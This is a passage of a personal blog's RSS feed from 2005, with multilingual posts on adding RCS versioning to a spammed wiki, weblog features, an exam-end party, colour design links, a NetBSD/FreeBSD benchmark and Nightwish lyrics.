  9750.    <link>https://blog.x-way.org/Coding/2005/02/22/phiki_waterwave_ch.html</link>
  9751.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324060</guid>
  9752.    <dc:creator>Andreas Jaggi</dc:creator>
  9753.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  9754.    <pubDate>Tue, 22 Feb 2005 13:32:04 +0000</pubDate>
  9755.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  9756.    <description><![CDATA[<p>A month ago or so, someone <a title="Spammed phiki.waterwave.ch" href="https://phiki.x-way.org/phiki.php?goto=FrontPage&amp;r=1.5">spammed</a> my <a title="phiki.waterwave.ch" href="https://phiki.x-way.org">Wiki</a> with asian links. This overwrote all my data because <a title="PhikiWiki (archive.org)" href="https://web.archive.org/web/20050308185206/http://ontosys.com/phiki/?PhikiWiki">PhikiWiki</a>
  9757. doesn't have a backup-mechanism or a versioning system. Since i had a
  9758. backup of the webserver, i could restore the Wiki. But i didn't want to
  9759. restore manually the backup via FTP each time someone overwrites my
  9760. Data.
  9761. </p>
  9762.  
  9763. <p>So i built a versioning system based on <a title="RCS - GNU Project" href="http://www.gnu.org/software/rcs/rcs.html"><code>rcs</code></a>. I've searched the write and read functions in the code and added just an <code>co</code> before the read function and a <code>ci</code> before the write function.</p>
  9764.  
  9765. <p>Now each time someone changes a document, it's stored as a new
  9766. version of the document. The different versions are made accesible by
  9767. the <code>r=</code> GET-parameter (example: version <a title="FrontPage - Version 1.38" href="https://phiki.x-way.org/phiki.php?goto=FrontPage&amp;r=1.38">1.38</a> and <a title="FrontPage - Version 1.50" href="https://phiki.x-way.org/phiki.php?goto=FrontPage&amp;r=1.50">1.50</a> of <a title="FrontPage" href="https://phiki.x-way.org/phiki.php?goto=FrontPage">FrontPage</a>).<br>
  9768. If now someone fills my Wiki with spam, i can just load the last good
  9769. version and store it as the new version. No need to replay a backup via
  9770. FTP.</p>
  9771.  
  9772. <p>The syntax of <a title="PhikiWiki (archive.org)" href="https://web.archive.org/web/20050308185206/http://ontosys.com/phiki/?PhikiWiki">PhikiWiki</a> doesn't have enough features for my needs, so i decided to use <a title="Daring Fireball: Markdown" href="http://daringfireball.net/projects/markdown/">Markdown</a> instead. I just removed all the formatting stuff of phiki and added a simple <code>Markdown($txt);</code> call.</p>
  9773. ]]></description>
  9774.    <content:encoded><![CDATA[<p>A month ago or so, someone <a title="Spammed phiki.waterwave.ch" href="https://phiki.x-way.org/phiki.php?goto=FrontPage&amp;r=1.5">spammed</a> my <a title="phiki.waterwave.ch" href="https://phiki.x-way.org">Wiki</a> with asian links. This overwrote all my data because <a title="PhikiWiki (archive.org)" href="https://web.archive.org/web/20050308185206/http://ontosys.com/phiki/?PhikiWiki">PhikiWiki</a>
  9775. doesn't have a backup-mechanism or a versioning system. Since i had a
  9776. backup of the webserver, i could restore the Wiki. But i didn't want to
  9777. restore manually the backup via FTP each time someone overwrites my
  9778. Data.
  9779. </p>
  9780.  
  9781. <p>So i built a versioning system based on <a title="RCS - GNU Project" href="http://www.gnu.org/software/rcs/rcs.html"><code>rcs</code></a>. I've searched the write and read functions in the code and added just an <code>co</code> before the read function and a <code>ci</code> before the write function.</p>
  9782.  
  9783. <p>Now each time someone changes a document, it's stored as a new
  9784. version of the document. The different versions are made accesible by
  9785. the <code>r=</code> GET-parameter (example: version <a title="FrontPage - Version 1.38" href="https://phiki.x-way.org/phiki.php?goto=FrontPage&amp;r=1.38">1.38</a> and <a title="FrontPage - Version 1.50" href="https://phiki.x-way.org/phiki.php?goto=FrontPage&amp;r=1.50">1.50</a> of <a title="FrontPage" href="https://phiki.x-way.org/phiki.php?goto=FrontPage">FrontPage</a>).<br>
  9786. If now someone fills my Wiki with spam, i can just load the last good
  9787. version and store it as the new version. No need to replay a backup via
  9788. FTP.</p>
  9789.  
  9790. <p>The syntax of <a title="PhikiWiki (archive.org)" href="https://web.archive.org/web/20050308185206/http://ontosys.com/phiki/?PhikiWiki">PhikiWiki</a> doesn't have enough features for my needs, so i decided to use <a title="Daring Fireball: Markdown" href="http://daringfireball.net/projects/markdown/">Markdown</a> instead. I just removed all the formatting stuff of phiki and added a simple <code>Markdown($txt);</code> call.</p>
  9791. ]]></content:encoded>
  9792.  </item>
  9793.  
  9794.  <item>
  9795.    <title>v2_05-rc1</title>
  9796.    <link>https://blog.x-way.org/Coding/2005/02/22/v2_05-rc1.html</link>
  9797.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324059</guid>
  9798.    <dc:creator>Andreas Jaggi</dc:creator>
  9799.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  9800.    <pubDate>Tue, 22 Feb 2005 12:13:24 +0000</pubDate>
  9801.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  9802.    <description><![CDATA[<p>Wie immer in den Ferien bastle ich ein bisschen an meinem Weblog rum.</p>
  9803.  
  9804. <p>Dem allgemeinen Trend folgend, werden hier nun auch <a href="http://gravatar.com/" title="gravatar.com">Gravatare</a> unterstützt (Das sind die kleinen Bildchen, welche anhand der E-Mail Adresse angezeigt werden. <a href="http://waterwave.ch/weblog/detail.php?label=Flash-Sites" title="Gravatar Beispiel">Beispiel</a>). Wer noch keinen hat, einfach bei <a href="http://gravatar.com/" title="Gravatar">gravatar.com</a> die E-Mail Adresse registrieren, Bild hinaufladen fertig :-)</p>
  9805.  
  9806. <p>Seit Anfang dieses Jahres gibt es hier nebst deutschen und französischen Inhalten auch noch <a href="http://waterwave.ch/weblog/detail.php?label=English" title="English">englische Beiträge</a>. Bei den <a href="http://waterwave.ch/weblog/settings.php" title="x-log - Einstellungen">Einstellungen</a>, kann man sich eine beliebige Kombination zusammenmixen.</p>
  9807.  
  9808. <p>Das Admininterface habe ich mit Hilfe von <a href="http://www-106.ibm.com/developerworks/library/wa-httpget/" title="Get dynamic Web content with HTTPRequest">xmlHTTPRequest</a> um einen <a href="https://phiki.x-way.org/phiki.php?JavaScript" title="phiki.waterwave.ch - JavaScript">JavaScript</a> <a href="https://web.archive.org/web/20050218093846/https://movabletype.org/docs/mttrackback.html" title="TrackBack Technical Specification (archive.org)">TrackBack</a>
  9809. Client erweitert.<br>
  9810. Leider erlaubt Mozilla keine xmlHTTPRequests auf eine
  9811. andere als die eigene Domain, was die Nutzung sehr einschränkt. Aber
  9812. vielleicht folgt Mozilla in Zukunft dem Beispiel von Safari und erlaubt
  9813. GET-Requests auf beliebige Domains.
  9814. </p>
  9815. ]]></description>
  9816.    <content:encoded><![CDATA[<p>Wie immer in den Ferien bastle ich ein bisschen an meinem Weblog rum.</p>
  9817.  
  9818. <p>Dem allgemeinen Trend folgend, werden hier nun auch <a href="http://gravatar.com/" title="gravatar.com">Gravatare</a> unterstützt (Das sind die kleinen Bildchen, welche anhand der E-Mail Adresse angezeigt werden. <a href="http://waterwave.ch/weblog/detail.php?label=Flash-Sites" title="Gravatar Beispiel">Beispiel</a>). Wer noch keinen hat, einfach bei <a href="http://gravatar.com/" title="Gravatar">gravatar.com</a> die E-Mail Adresse registrieren, Bild hinaufladen fertig :-)</p>
  9819.  
  9820. <p>Seit Anfang dieses Jahres gibt es hier nebst deutschen und französischen Inhalten auch noch <a href="http://waterwave.ch/weblog/detail.php?label=English" title="English">englische Beiträge</a>. Bei den <a href="http://waterwave.ch/weblog/settings.php" title="x-log - Einstellungen">Einstellungen</a>, kann man sich eine beliebige Kombination zusammenmixen.</p>
  9821.  
  9822. <p>Das Admininterface habe ich mit Hilfe von <a href="http://www-106.ibm.com/developerworks/library/wa-httpget/" title="Get dynamic Web content with HTTPRequest">xmlHTTPRequest</a> um einen <a href="https://phiki.x-way.org/phiki.php?JavaScript" title="phiki.waterwave.ch - JavaScript">JavaScript</a> <a href="https://web.archive.org/web/20050218093846/https://movabletype.org/docs/mttrackback.html" title="TrackBack Technical Specification (archive.org)">TrackBack</a>
  9823. Client erweitert.<br>
  9824. Leider erlaubt Mozilla keine xmlHTTPRequests auf eine
  9825. andere als die eigene Domain, was die Nutzung sehr einschränkt. Aber
  9826. vielleicht folgt Mozilla in Zukunft dem Beispiel von Safari und erlaubt
  9827. GET-Requests auf beliebige Domains.
  9828. </p>
  9829. ]]></content:encoded>
  9830.  </item>
  9831.  
  9832.  <item>
  9833.    <title>Fin des Examens de printemps</title>
  9834.    <link>https://blog.x-way.org/School/2005/02/18/Fin-des-Examens-de-printemps.html</link>
  9835.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324058</guid>
  9836.    <dc:creator>Andreas Jaggi</dc:creator>
  9837.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  9838.    <pubDate>Fri, 18 Feb 2005 17:15:36 +0000</pubDate>
  9839.    <category domain="https://blog.x-way.org/School">School</category>
  9840.    <description><![CDATA[<p>Hier je me suis lev&#233; &#224; 5.30h apr&#232;s 5 heures de sommeil pour prendre
  9841. le train de 6.43 en direction Renens. Avec le TSOL je suis arriv&#233; &#224;
  9842. l'<a href="http://www.epfl.ch/" title="École Polytechnique Fédérale de Lausanne">EPFL</a> pour faire cette merde d'&#233;xamen <a href="https://web.archive.org/web/20050305233849/http://lampwww.epfl.ch/teaching/it3/2004/html/" title="Informatique Théorique III (archive.org)">informatique th&#233;orique III</a>.</p>
  9843.  
  9844. <p>&#192; midi j'ai mang&#233; avec mes copains et puis on est all&#233; &#224; <a href="http://satwww.epfl.ch/" title="Satellite - Bar, Concerts, Cafés-Théâtres">Sat</a>: Pichet. Pichet. Pichet. Pichet. Pichet. Pichet. Pichet.</p>
  9845.  
  9846. <p>
  9847. Ensuite j'ai d&#238;n&#233; chez un copain avant d'aller au <a href="http://www.unil.ch/planetebleue/" title="Planète bleue">Plan&#232;te bleue</a> ou on a
  9848. continue la f&#234;te de fin des &#233;xamens avec pas mal de Vodka.<br>
  9849. Apr&#232;s minuit on est all&#233; au Jaggers. Vers 4 heures on est sortie du Jaggers et ceux qui habitent en ville se sont couch&#233;s.</p>
  9850.  
  9851. <p>Mais mois et un copain qui n'habite pas en ville, nous sommes march&#233;s &#224; <a href="http://satwww.epfl.ch/" title="Satellite - Bar, Concerts, Cafés-Théâtres">Sat</a> car il n'y a pas de TSOL &#224; cette heure.<br>
  9852. Vers 5 heures on y est arriv&#233;. Heureusement <a href="http://satwww.epfl.ch/" title="Satellite - Bar, Concerts, Cafés-Théâtres">Sat</a> &#233;tait ouvert toute la nuit.<br>
  9853. Puis je suis retourn&#233; &#224; Vufflens-la-Ville avec le TSOL et le train apr&#232;s 7 heures.</p>
  9854.  
  9855. <p>
  9856. &#192; 7.30h je me suis enfin couch&#233;, apr&#232;s 26 heures sans sommeil dont 19 de la f&#234;te.</p>
  9857. ]]></description>
  9858.    <content:encoded><![CDATA[<p>Hier je me suis lev&#233; &#224; 5.30h apr&#232;s 5 heures de sommeil pour prendre
  9859. le train de 6.43 en direction Renens. Avec le TSOL je suis arriv&#233; &#224;
  9860. l'<a href="http://www.epfl.ch/" title="École Polytechnique Fédérale de Lausanne">EPFL</a> pour faire cette merde d'&#233;xamen <a href="https://web.archive.org/web/20050305233849/http://lampwww.epfl.ch/teaching/it3/2004/html/" title="Informatique Théorique III (archive.org)">informatique th&#233;orique III</a>.</p>
  9861.  
  9862. <p>&#192; midi j'ai mang&#233; avec mes copains et puis on est all&#233; &#224; <a href="http://satwww.epfl.ch/" title="Satellite - Bar, Concerts, Cafés-Théâtres">Sat</a>: Pichet. Pichet. Pichet. Pichet. Pichet. Pichet. Pichet.</p>
  9863.  
  9864. <p>
  9865. Ensuite j'ai d&#238;n&#233; chez un copain avant d'aller au <a href="http://www.unil.ch/planetebleue/" title="Planète bleue">Plan&#232;te bleue</a> ou on a
  9866. continue la f&#234;te de fin des &#233;xamens avec pas mal de Vodka.<br>
  9867. Apr&#232;s minuit on est all&#233; au Jaggers. Vers 4 heures on est sortie du Jaggers et ceux qui habitent en ville se sont couch&#233;s.</p>
  9868.  
  9869. <p>Mais mois et un copain qui n'habite pas en ville, nous sommes march&#233;s &#224; <a href="http://satwww.epfl.ch/" title="Satellite - Bar, Concerts, Cafés-Théâtres">Sat</a> car il n'y a pas de TSOL &#224; cette heure.<br>
  9870. Vers 5 heures on y est arriv&#233;. Heureusement <a href="http://satwww.epfl.ch/" title="Satellite - Bar, Concerts, Cafés-Théâtres">Sat</a> &#233;tait ouvert toute la nuit.<br>
  9871. Puis je suis retourn&#233; &#224; Vufflens-la-Ville avec le TSOL et le train apr&#232;s 7 heures.</p>
  9872.  
  9873. <p>
  9874. &#192; 7.30h je me suis enfin couch&#233;, apr&#232;s 26 heures sans sommeil dont 19 de la f&#234;te.</p>
  9875. ]]></content:encoded>
  9876.  </item>
  9877.  
  9878.  <item>
  9879.    <title>Nach dem Booten</title>
  9880.    <link>https://blog.x-way.org/Misc/2005/01/09/Nach-dem-Booten.html</link>
  9881.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324057</guid>
  9882.    <dc:creator>Andreas Jaggi</dc:creator>
  9883.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  9884.    <pubDate>Sun, 09 Jan 2005 00:24:59 +0000</pubDate>
  9885.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  9886.    <description><![CDATA[<p>Die ersten 5 Dinge, die ich tue, wenn ich mich an den Computer setze:</p>
  9887.  
  9888. <ol>
  9889.  
  9890.  
  9891. <li>Einloggen</li>
  9892.  
  9893. <li>startx</li>
  9894.  
  9895. <li>Sylpheed-Claws, Firefox und XMMS starten</li>
  9896.  
  9897. <li>Warten bis die E-Mails abgerufen sind</li>
  9898.  
  9899. <li>E-Mails lesen</li>
  9900. </ol>
  9901.  
  9902. <p>Die ersten 5 Websites, die ich besuche:</p>
  9903.  
  9904. <ol>
  9905. <li>x-log</li>
  9906.  
  9907. <li>symlink.ch</li>
  9908.  
  9909. <li>heise.de</li>
  9910.  
  9911. <li>der Rest hängt davon ab, was ich eigentlich am Computer machen wollte</li>
  9912.  
  9913. <li>&#8230;</li>
  9914. </ol>
  9915.  
  9916. <p>Via <a href="https://web.archive.org/web/20050124182604/http://www.cyrus.ruhr.de/article/99/einschaltrituale" title="cyrus.ruhr.de: Einschaltrituale (archive.org)">cyrus.ruhr.de</a>, <a href="https://web.archive.org/web/20050121103144/http://web51.hosting.venue.de/sunlog/item.php?i=490" title="Pocket-Blog (archive.org)">Pocket-Blog</a>, <a href="http://www.lostfocus.de/archives/2005/01/08/chronologisch-und-nachgemacht/" title="LostFocus  Chronologisch und nachgemacht">LostFocus</a>, <a href="https://web.archive.org/web/20051018061733/http://latenightblog.com/index.php?id=305" title="Die fünf ersten - Late Night Blog (archive.org)">Late Night Blog</a>.</p>
  9917. ]]></description>
  9918.    <content:encoded><![CDATA[<p>Die ersten 5 Dinge, die ich tue, wenn ich mich an den Computer setze:</p>
  9919.  
  9920. <ol>
  9921.  
  9922.  
  9923. <li>Einloggen</li>
  9924.  
  9925. <li>startx</li>
  9926.  
  9927. <li>Sylpheed-Claws, Firefox und XMMS starten</li>
  9928.  
  9929. <li>Warten bis die E-Mails abgerufen sind</li>
  9930.  
  9931. <li>E-Mails lesen</li>
  9932. </ol>
  9933.  
  9934. <p>Die ersten 5 Websites, die ich besuche:</p>
  9935.  
  9936. <ol>
  9937. <li>x-log</li>
  9938.  
  9939. <li>symlink.ch</li>
  9940.  
  9941. <li>heise.de</li>
  9942.  
  9943. <li>der Rest hängt davon ab, was ich eigentlich am Computer machen wollte</li>
  9944.  
  9945. <li>&#8230;</li>
  9946. </ol>
  9947.  
  9948. <p>Via <a href="https://web.archive.org/web/20050124182604/http://www.cyrus.ruhr.de/article/99/einschaltrituale" title="cyrus.ruhr.de: Einschaltrituale (archive.org)">cyrus.ruhr.de</a>, <a href="https://web.archive.org/web/20050121103144/http://web51.hosting.venue.de/sunlog/item.php?i=490" title="Pocket-Blog (archive.org)">Pocket-Blog</a>, <a href="http://www.lostfocus.de/archives/2005/01/08/chronologisch-und-nachgemacht/" title="LostFocus  Chronologisch und nachgemacht">LostFocus</a>, <a href="https://web.archive.org/web/20051018061733/http://latenightblog.com/index.php?id=305" title="Die fünf ersten - Late Night Blog (archive.org)">Late Night Blog</a>.</p>
  9949. ]]></content:encoded>
  9950.  </item>
  9951.  
  9952.  <item>
  9953.    <title>Colors</title>
  9954.    <link>https://blog.x-way.org/Webdesign/2005/01/08/Colors.html</link>
  9955.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324056</guid>
  9956.    <dc:creator>Andreas Jaggi</dc:creator>
  9957.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  9958.    <pubDate>Sat, 08 Jan 2005 23:02:15 +0000</pubDate>
  9959.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  9960.    <description><![CDATA[<p>I&#8217;ve found some color resources &amp; utilities on <a href="http://del.icio.us/" title="del.icio.us">del.icio.us</a>.
  9961. These are always useful, especially since i&#8217;m not the person who can
  9962. just throw together three colors and automatically the result looks
  9963. good.</p>
  9964.  
  9965. <ul>
  9966. <li><a href="http://www.easyrgb.com/harmonies.php" title="EasyRGB - Color harmonies, complements and themes">EasyRGB</a> &#8211; Search for color harmonies, complements and themes for your RBG values</li>
  9967.  
  9968. <li><a href="http://www.meyerweb.com/eric/tools/color-blend/" title="Color Blender">Color Blender</a> &#8211; Calculate midpoint colors</li>
  9969.  
  9970. <li><a href="http://www.ficml.org/jemimap/style/color/wheel.html" title="4096 Color Wheel Version 2.1">4096 Color Wheel</a> &#8211; Color Wheel with corresponding web-safe &amp; web-smart colors</li>
  9971.  
  9972. <li><a href="https://web.archive.org/web/20050104120517/http://www.returnofdesign.com/spectacle/show.php?page=16" title="Spectacle - Color Schemes (archive.org)">Spectacle</a> &#8211; Tweaked web-smart Color Schemes</li>
  9973.  
  9974. <li><a href="https://web.archive.org/web/20050106090609/http://www.adampolselli.com/getthelook/" title="Adam Poselli - Get the Look (archive.org)">Adam Poselli &#187; Get the Look</a> &#8211; Design &amp; style guides</li>
  9975.  
  9976. <li><a href="https://web.archive.org/web/20050106013852/http://www.adampolselli.com/colorschemes/" title="Adam Poselli Where'd Ya Get That Color Scheme? (archive.org)">Adam Poselli &#187; Where&#8217;d Ya Get That Color Scheme?</a> &#8211; Color schemes from photographs</li>
  9977.  
  9978. <li><a href="https://web.archive.org/web/20050107051258/http://www.adampolselli.com/2005/" title="Adam Poselli's 2005 Color Forecast (archive.org)">Adam Poselli&#8217;s 2005 Color Forecast</a> &#8211; Colors</li>
  9979.  
  9980. <li><a href="https://web.archive.org/web/20050207200353/http://www.adampolselli.com/archives/2003/12/24/2004_color_forecast.php" title="Adam Poselli's 2004 Color Forecast (archive.org)">Adam Poselli&#8217;s 2004 Color Forecast</a> &#8211; More colors</li>
  9981.  
  9982. <li><a href="https://web.archive.org/web/20050111092950/http://www.mezzoblue.com/archives/2004/05/14/colour_schem/" title="mezzoblue Colour Schemes (archive.org)">mezzoblue &#167; Colour Schemes</a> &#8211; How to select colors</li>
  9983. </ul>
  9984. ]]></description>
  9985.    <content:encoded><![CDATA[<p>I&#8217;ve found some color resources &amp; utilities on <a href="http://del.icio.us/" title="del.icio.us">del.icio.us</a>.
  9986. These are always useful, especially since i&#8217;m not the person who can
  9987. just throw together three colors and automatically the result looks
  9988. good.</p>
  9989.  
  9990. <ul>
  9991. <li><a href="http://www.easyrgb.com/harmonies.php" title="EasyRGB - Color harmonies, complements and themes">EasyRGB</a> &#8211; Search for color harmonies, complements and themes for your RBG values</li>
  9992.  
  9993. <li><a href="http://www.meyerweb.com/eric/tools/color-blend/" title="Color Blender">Color Blender</a> &#8211; Calculate midpoint colors</li>
  9994.  
  9995. <li><a href="http://www.ficml.org/jemimap/style/color/wheel.html" title="4096 Color Wheel Version 2.1">4096 Color Wheel</a> &#8211; Color Wheel with corresponding web-safe &amp; web-smart colors</li>
  9996.  
  9997. <li><a href="https://web.archive.org/web/20050104120517/http://www.returnofdesign.com/spectacle/show.php?page=16" title="Spectacle - Color Schemes (archive.org)">Spectacle</a> &#8211; Tweaked web-smart Color Schemes</li>
  9998.  
  9999. <li><a href="https://web.archive.org/web/20050106090609/http://www.adampolselli.com/getthelook/" title="Adam Poselli - Get the Look (archive.org)">Adam Poselli &#187; Get the Look</a> &#8211; Design &amp; style guides</li>
  10000.  
  10001. <li><a href="https://web.archive.org/web/20050106013852/http://www.adampolselli.com/colorschemes/" title="Adam Poselli Where'd Ya Get That Color Scheme? (archive.org)">Adam Poselli &#187; Where&#8217;d Ya Get That Color Scheme?</a> &#8211; Color schemes from photographs</li>
  10002.  
  10003. <li><a href="https://web.archive.org/web/20050107051258/http://www.adampolselli.com/2005/" title="Adam Poselli's 2005 Color Forecast (archive.org)">Adam Poselli&#8217;s 2005 Color Forecast</a> &#8211; Colors</li>
  10004.  
  10005. <li><a href="https://web.archive.org/web/20050207200353/http://www.adampolselli.com/archives/2003/12/24/2004_color_forecast.php" title="Adam Poselli's 2004 Color Forecast (archive.org)">Adam Poselli&#8217;s 2004 Color Forecast</a> &#8211; More colors</li>
  10006.  
  10007. <li><a href="https://web.archive.org/web/20050111092950/http://www.mezzoblue.com/archives/2004/05/14/colour_schem/" title="mezzoblue Colour Schemes (archive.org)">mezzoblue &#167; Colour Schemes</a> &#8211; How to select colors</li>
  10008. </ul>
  10009. ]]></content:encoded>
  10010.  </item>
  10011.  
  10012.  <item>
  10013.    <title>NetBSD 2.0 vs FreeBSD 5.3</title>
  10014.    <link>https://blog.x-way.org/NetBSD/2005/01/07/NetBSD-20-vs-FreeBSD-53.html</link>
  10015.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324055</guid>
  10016.    <dc:creator>Andreas Jaggi</dc:creator>
  10017.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10018.    <pubDate>Fri, 07 Jan 2005 21:00:56 +0000</pubDate>
  10019.    <category domain="https://blog.x-way.org/NetBSD">NetBSD</category>
  10020.    <description><![CDATA[<p>Gregory McGarry has made a <a href="http://www.feyrer.de/NetBSD/gmcgarry/" title="Benchmark Comparison of NetBSD 2.0 and FreeBSD 5.3">benchmark comparison between NetBSD 2.0 and FreeBSD 5.3</a>.<br>(<a href="https://web.archive.org/web/20050305191302/http://weblog.bsd-network.org/archives/2005/01/06/netbsd-vs-freebsd-der-benchmark/" title="NetBSD vs FreeBSD (der Benchmark) (archive.org)">via mindtrap::weblog</a>)</p>
  10021. <p>The main differences are that NetBSD scales <i>O</i>(1) on forking new
  10022. processes while FreeBSD scales <i>O</i>(<i>n</i>). For memory mapping and socket
  10023. creation both scale <i>O</i>(1) but NetBSD is twice as fast as FreeBSD
  10024. <br>But for binding addresses to sockets, FreeBSD scales <i>O</i>(1) while
  10025. NetBSD scales <i>O</i>(<i>n</i>) but is twice as fast for a small number of bound
  10026. sockets. Also for POSIX thread creation FreeBSD scales <i>O</i>(1) while
  10027. NetBSD scales something like <i>O</i>(<i>n</i>) and is twice as fast for a small
  10028. number of threads.</p>
  10029. <blockquote cite="http://www.feyrer.de/NetBSD/gmcgarry/">
  10030. <p>This paper has presented a suite of benchmarks and results for comparing the performance of NetBSD 2.0 and FreeBSD 5.3 in the areas of core operating system functionality, network scalability and thread performance.</p>
  10031. <p>The results clearly indicate that recent architectural decisions in the NetBSD operating system have closed the performance gap between NetBSD and FreeBSD. In fact, NetBSD has surpassed FreeBSD in performance in the areas investigated in this paper. Significant performance improvements are obviously visible in the thread implementation.</p>
  10032. </blockquote>
  10033. ]]></description>
  10034.    <content:encoded><![CDATA[<p>Gregory McGarry has made a <a href="http://www.feyrer.de/NetBSD/gmcgarry/" title="Benchmark Comparison of NetBSD 2.0 and FreeBSD 5.3">benchmark comparison between NetBSD 2.0 and FreeBSD 5.3</a>.<br>(<a href="https://web.archive.org/web/20050305191302/http://weblog.bsd-network.org/archives/2005/01/06/netbsd-vs-freebsd-der-benchmark/" title="NetBSD vs FreeBSD (der Benchmark) (archive.org)">via mindtrap::weblog</a>)</p>
  10035. <p>The main differences are that NetBSD scales <i>O</i>(1) on forking new
  10036. processes while FreeBSD scales <i>O</i>(<i>n</i>). For memory mapping and socket
  10037. creation both scale <i>O</i>(1) but NetBSD is twice as fast as FreeBSD
  10038. <br>But for binding addresses to sockets, FreeBSD scales <i>O</i>(1) while
  10039. NetBSD scales <i>O</i>(<i>n</i>) but is twice as fast for a small number of bound
  10040. sockets. Also for POSIX thread creation FreeBSD scales <i>O</i>(1) while
  10041. NetBSD scales something like <i>O</i>(<i>n</i>) and is twice as fast for a small
  10042. number of threads.</p>
  10043. <blockquote cite="http://www.feyrer.de/NetBSD/gmcgarry/">
  10044. <p>This paper has presented a suite of benchmarks and results for comparing the performance of NetBSD 2.0 and FreeBSD 5.3 in the areas of core operating system functionality, network scalability and thread performance.</p>
  10045. <p>The results clearly indicate that recent architectural decisions in the NetBSD operating system have closed the performance gap between NetBSD and FreeBSD. In fact, NetBSD has surpassed FreeBSD in performance in the areas investigated in this paper. Significant performance improvements are obviously visible in the thread implementation.</p>
  10046. </blockquote>
  10047. ]]></content:encoded>
  10048.  </item>
  10049.  
  10050.  <item>
  10051.    <title>Nightwish - The Pharaoh Sails To Orion</title>
  10052.    <link>https://blog.x-way.org/Music/2005/01/06/Nightwish---The-Pharaoh-Sails-To-Orion.html</link>
  10053.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324054</guid>
  10054.    <dc:creator>Andreas Jaggi</dc:creator>
  10055.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10056.    <pubDate>Thu, 06 Jan 2005 14:24:02 +0000</pubDate>
  10057.    <category domain="https://blog.x-way.org/Music">Music</category>
  10058.    <description><![CDATA[<img src="https://blog.x-way.org/images/nightwish_oceanborn.jpg" alt="Nightwish - Oceanborn" title="Nightwish - Oceanborn" width="202" height="200">
  10059. <p>&quot;Get away from me!<br>
  10060. Take heed to thyself and see my face no more!<br>
  10061. for in the day Thou see my face<br>
  10062. Thou shalt die!&quot;<br>
  10063. &#8211; Exodus 10:28</p>
  10064. <br><br>
  10065. <p>A constellation of divine architecture built on Earth<br>
  10066. A holy harbour &#8211; Orion<br>
  10067. Nautical ascension to the firmament
  10068. </p>
  10069.  
  10070. <p>
  10071. Ship-shaped barrows open my heart to the wisdom of this land<br>
  10072. Sailing with the Serpent Chimera of a fiendish sandman
  10073. </p>
  10074.  
  10075. <p>
  10076. The Unicorn arrives with the westwind to dream His funeral<br>
  10077. &quot;Thou art born for Horus dwells in Thee&quot;
  10078. </p>
  10079.  
  10080. <p>
  10081. Slumbering with the ebb and the flow of this foaming tomb<br>
  10082. &quot;Thou art born for Seteh dwells in Thee&quot;
  10083. </p>
  10084.  
  10085. <p>
  10086. Reveal your face to me and guide me through the Stygian fields<br>
  10087. Enthral my soul to Sepedet&rsquo;s beams to serve Your will
  10088. </p>
  10089.  
  10090. <p>
  10091. <i>Sailing on the distant seas from darkness to deliverance<br>
  10092. Tales like the ocean written to the Draco&rsquo;s glance
  10093. </i></p>
  10094.  
  10095. <p>
  10096. <i>Ruling with the scythe of death you tear our philosophies apart<br>
  10097. An ancient starwalk to merge into the stars</i>
  10098. </p>
  10099.  
  10100. <p>
  10101. &quot;Open thy veins for my venom<br>
  10102. Kiss the cobras with thy twisted tongue<br>
  10103. So shalt thou join the empyrean circus<br>
  10104. Where beggars mourn and seraphs dance<br>
  10105. In this twilight cathedral<br>
  10106. Shall I wed thee,<br>
  10107. O Bride of the Netherworld&quot;
  10108. </p>
  10109.  
  10110. <p>
  10111. <i>Sailing on the distant seas...</i>
  10112. </p>
  10113.  
  10114. <p>
  10115. Join my soul the Hunter in the sky
  10116. </p>
  10117. ]]></description>
  10118.    <content:encoded><![CDATA[<img src="https://blog.x-way.org/images/nightwish_oceanborn.jpg" alt="Nightwish - Oceanborn" title="Nightwish - Oceanborn" width="202" height="200">
  10119. <p>&quot;Get away from me!<br>
  10120. Take heed to thyself and see my face no more!<br>
  10121. for in the day Thou see my face<br>
  10122. Thou shalt die!&quot;<br>
  10123. &#8211; Exodus 10:28</p>
  10124. <br><br>
  10125. <p>A constellation of divine architecture built on Earth<br>
  10126. A holy harbour &#8211; Orion<br>
  10127. Nautical ascension to the firmament
  10128. </p>
  10129.  
  10130. <p>
  10131. Ship-shaped barrows open my heart to the wisdom of this land<br>
  10132. Sailing with the Serpent Chimera of a fiendish sandman
  10133. </p>
  10134.  
  10135. <p>
  10136. The Unicorn arrives with the westwind to dream His funeral<br>
  10137. &quot;Thou art born for Horus dwells in Thee&quot;
  10138. </p>
  10139.  
  10140. <p>
  10141. Slumbering with the ebb and the flow of this foaming tomb<br>
  10142. &quot;Thou art born for Seteh dwells in Thee&quot;
  10143. </p>
  10144.  
  10145. <p>
  10146. Reveal your face to me and guide me through the Stygian fields<br>
  10147. Enthral my soul to Sepedet&rsquo;s beams to serve Your will
  10148. </p>
  10149.  
  10150. <p>
  10151. <i>Sailing on the distant seas from darkness to deliverance<br>
  10152. Tales like the ocean written to the Draco&rsquo;s glance
  10153. </i></p>
  10154.  
  10155. <p>
  10156. <i>Ruling with the scythe of death you tear our philosophies apart<br>
  10157. An ancient starwalk to merge into the stars</i>
  10158. </p>
  10159.  
  10160. <p>
  10161. &quot;Open thy veins for my venom<br>
  10162. Kiss the cobras with thy twisted tongue<br>
  10163. So shalt thou join the empyrean circus<br>
  10164. Where beggars mourn and seraphs dance<br>
  10165. In this twilight cathedral<br>
  10166. Shall I wed thee,<br>
